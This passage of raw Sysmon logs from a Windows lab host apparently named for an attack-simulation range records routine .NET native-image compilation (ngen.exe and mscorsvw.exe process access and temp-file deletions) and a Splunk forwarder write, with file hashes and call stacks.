21:07:05.089{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7605-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.074{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7605-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.074{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7605-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.074{4DB9351A-A279-60D3-7505-00000000CF01}5608NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B24I0ERW2E\Microsoft.UpdateServices.SMPlugin.ni.dll.auxMD5=35D8DCF676786E976EB9D8C7D06C7C8B,SHA256=EF7948E7E90D1178643DE89281DF4D2EABF29CC4BBCCBC46362AB04AF77237A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.074{4DB9351A-A279-60D3-7505-00000000CF01}5608NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B24I0ERW2E\Microsoft.UpdateServices.SMPlugin.ni.dllMD5=63E6B1D8F8F31AEDD8FC2D314135A185,SHA256=67936EBD051200CCB67490A13458DAF0C302E108B4ADED5329D538F08D523FCA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.042{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7505-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.027{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7505-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.027{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7505-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.027{4DB9351A-A278-60D3-7405-00000000CF01}3980NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DFJW59PZRN\Microsoft.Transactions.Bridge.Dtc.ni.dll.auxMD5=2AF9E66B474643A9E375545A152536D8,SHA256=220854FCB1AFCACF67D72FF93115546EDFDE8085BB33410CB96ECC5C7CA7F17A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.027{4DB9351A-A278-60D3-7405-00000000CF01}3980NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DFJW59PZRN\Microsoft.Transactions.Bridge.Dtc.ni.dllMD5=E085A8BAF6E4C8CCB8E514753420E404,SHA256=A854D51938433D798C1DE6CFBCDA7C12AFE1C8AB97681463B3A3C30DF0E26724,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.996{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7405-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.996{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8C05-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.996{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8C05-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.980{4DB9351A-A27A-60D3-8B05-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RJOZJEHMIE\Microsoft.Windows.ServerManager.Activities.ni.dll.auxMD5=AA39F5502D3C4C2B06BC0DD83C8D2AD5,SHA256=DB87C98AC9A71D15421DF4978A941B8B99AC20498A7F590DD9AF1CB8625E79D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.980{4DB9351A-A27A-60D3-8B05-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RJOZJEHMIE\Microsoft.Windows.ServerManager.Activities.ni.dllMD5=A002BB086FCA0F268FA55AD53A3DD811,SHA256=8AB454737585551E47EBBB10536FC52BD9E44E2C0CF95A6E70D6443EA528EC5D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.980{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=561A564BB5E95838AE05629087FD41BA,SHA256=FD1DCC1A21829C3FA1A6F00FB68D8F877895E5DFB2C6E0F8407CA70DCCA7E84E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.949{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8B05-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.918{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8B05-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.918{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8B05-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.918{4DB9351A-A27A-60D3-8A05-00000000CF01}6864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PXTXKM3EZI\Microsoft.Windows.HostGuardianService.Plugin.ni.dll.auxMD5=9A6C3F69D11E73268AA552ABD84F17D4,SHA256=7EB2E85FC40DB4E1739FFAC27F43F2C3409AC19CE3DE46EF6991A56B09FCC4FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.918{4DB9351A-A27A-60D3-8A05-00000000CF01}6864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PXTXKM3EZI\Microsoft.Windows.HostGuardianService.Plugin.ni.dllMD5=7BFDB7B3DB0D1F7381DBA4DDD7F2BB23,SHA256=F8ADA264A98206E161A8D2753403342465EC1D68B3F6D73DF35F15C1A270915C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.886{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8A05-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.855{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8A05-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.855{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8A05-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.839{4DB9351A-A27A-60D3-8905-00000000CF01}6896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TKIP9K5UUF\Microsoft.Windows.FileServer.Management.ServerManagerProxy.ni.dll.auxMD5=B0E0E00787F3843C7F8C297E0283BFB0,SHA256=31DB045391A57A85A3A924EB4B2F6B5AF54A5664C67C23E5B3BCFEC4680F4F41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.839{4DB9351A-A27A-60D3-8905-00000000CF01}6896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TKIP9K5UUF\Microsoft.Windows.FileServer.Management.ServerManagerProxy.ni.dllMD5=40C57180E934D667E669AA492CD71485,SHA256=C68AFA135A9AC339A89906612988559A7EBD4D2DDAC303A716B9603268336C25,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8905-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.808{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8905-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.808{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8905-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 